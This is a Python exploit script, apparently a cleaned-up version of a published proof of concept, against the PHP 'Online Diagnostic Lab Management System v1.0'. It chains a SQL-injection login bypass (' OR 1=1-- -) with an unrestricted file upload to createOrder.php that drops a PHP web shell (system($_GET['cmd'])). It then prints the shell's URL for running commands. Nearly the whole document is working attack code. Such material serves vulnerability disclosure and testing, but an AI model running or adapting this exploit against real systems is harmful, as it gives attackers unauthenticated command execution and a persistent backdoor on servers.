
# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-09-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: No - the login form is bypassed with a SQL injection in the username field (' OR 1=1-- -), so no valid credentials are needed; the file upload in php_action/createOrder.php is then reached with the resulting session
#!/usr/bin/env python3
import os
import random
import secrets
import sys
import time

import requests
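# ---------------------------------------------------------------------------
# Exploit flow (same as the original PoC):
#   1. POST to login.php with a SQL-injection username so the login check is
#      bypassed without knowing any credentials.
#   2. POST a multipart "create order" form to php_action/createOrder.php
#      whose "productImage" part is a one-line PHP web shell; the handler
#      evidently stores it under assets/myimages/ with the supplied filename.
#   3. Print the URL of the stored shell.
#
# Changes versus the original script: the payload is sent from memory instead
# of being written to a local rev.php that was never closed or removed; only
# the screen-clear command that exists on this OS is run (the original ran
# both "cls" and "clear", one of which always printed an error); the base URL
# is normalised so a trailing slash does not produce "//diagnostic/..."; every
# request has a timeout and network errors are reported instead of raising a
# traceback; the shell filename comes from the CSPRNG; and the logic is split
# into small functions under a main() guard so it can be imported and tested.
# ---------------------------------------------------------------------------

LOGIN_PATH = "/diagnostic/login.php"
UPLOAD_PATH = "/diagnostic/php_action/createOrder.php"
SHELL_DIR = "/diagnostic/assets/myimages/"

# Authentication bypass payload. It only works because login.php is assumed to
# concatenate the username into its SQL query (the original PoC relies on
# this); the password value is irrelevant.
SQLI_USERNAME = "' OR 1=1-- -"
SQLI_PASSWORD = "test"
LOGIN_OK_MARKER = "Login Successfully"

# Minimal web shell; the command arrives in the "cmd" query-string parameter.
PAYLOAD = "<?php system($_GET['cmd']);?>"

TIMEOUT = 15  # seconds per HTTP request

# Every non-file field of the createOrder.php form; all are sent empty.
_ORDER_FIELDS = (
    "orderDate",
    "clientName",
    "clientContact",
    "productName[]",
    "rateValue[]",
    "quantity[]",
    "totalValue[]",
    "subTotalValue",
    "totalAmountValue",
    "discount",
    "grandTotalValue",
    "gstn",
    "vatValue",
    "paid",
    "dueValue",
    "paymentType",
    "paymentStatus",
    "paymentPlace",
)

logo = '''
##################################################################
# #
# Exploit Script ( Online Diagnostic Lab Management System ) #
# #
##################################################################
'''


def _clear_screen() -> None:
    """Clear the terminal using the command that exists on this platform."""
    os.system("cls" if os.name == "nt" else "clear")


def _normalize_url(url: str) -> str:
    """Strip surrounding whitespace and a trailing slash from the base URL.

    The request paths below all start with "/", so a trailing slash on the
    user-supplied URL would otherwise yield "http://host//diagnostic/...".
    """
    return url.strip().rstrip("/")


def _shell_name() -> str:
    """Return an unpredictable ``.php`` filename for the dropped web shell.

    The shell is unauthenticated: anyone who learns the URL can run commands
    on the target. The random name is the only thing keeping it private, so
    it is drawn from the CSPRNG rather than ``random``.
    """
    return secrets.token_hex(16) + ".php"


def _build_upload_form(name_file: str, payload: str = PAYLOAD) -> dict:
    """Build the multipart body for createOrder.php.

    Args:
        name_file: filename the server will store the "productImage" part as.
        payload: PHP source of the web shell.

    Returns:
        A ``files=`` mapping for ``requests``: each order field is an empty
        form value ``(None, "")`` and ``productImage`` is ``(name_file, bytes)``.
        The file part is a 2-tuple, so no Content-Type header is attached to
        it, exactly as in the original PoC.
    """
    form = {field: (None, "") for field in _ORDER_FIELDS}
    form["productImage"] = (name_file, payload.encode())
    return form


def _shell_url(base_url: str, name_file: str) -> str:
    """Return the URL at which the uploaded shell is expected to be served."""
    return base_url + SHELL_DIR + name_file


def _login(session, base_url: str) -> bool:
    """POST the SQL-injection login and report whether the bypass worked.

    Raises:
        requests.RequestException: on connection or timeout failure.
    """
    response = session.post(
        base_url + LOGIN_PATH,
        data={"username": SQLI_USERNAME, "password": SQLI_PASSWORD},
        timeout=TIMEOUT,
    )
    return LOGIN_OK_MARKER in response.text


def _upload_shell(session, base_url: str, name_file: str):
    """POST the order form carrying the web shell and return the response.

    Raises:
        requests.RequestException: on connection or timeout failure.
    """
    return session.post(
        base_url + UPLOAD_PATH,
        files=_build_upload_form(name_file),
        timeout=TIMEOUT,
    )


def main() -> int:
    """Interactive entry point: bypass login, drop the shell, print its URL.

    Returns:
        A process exit status: 0 on success, 1 on login or network failure.
    """
    _clear_screen()
    print(logo)
    base_url = _normalize_url(input("Enter website url : "))
    # A single Session keeps the cookie issued by login.php so that
    # createOrder.php sees the same (bypassed) login; the upload handler
    # presumably requires it.
    session = requests.Session()
    try:
        if not _login(session, base_url):
            print("[-] Check username or password")
            return 1
        print("[+] Login Successfully")
        name_file = _shell_name()
        response = _upload_shell(session, base_url, name_file)
    except requests.RequestException as exc:
        print("[-] Request failed: " + str(exc))
        return 1
    if not response.ok:
        # Non-2xx from createOrder.php: still print the URL, but warn that the
        # file may not exist on the server.
        print("[!] Upload returned HTTP %d - the shell may not have been stored"
              % response.status_code)
    shell = _shell_url(base_url, name_file)
    print("[+] Check here file shell => " + shell)
    print("[+] can exect command here => " + shell + "?cmd=whoami")
    # Leaving the shell behind leaves an unauthenticated RCE backdoor on the
    # target; remind the operator to clean up.
    print("[!] Remember to delete " + shell + " from the target after testing")
    return 0


if __name__ == "__main__":
    sys.exit(main())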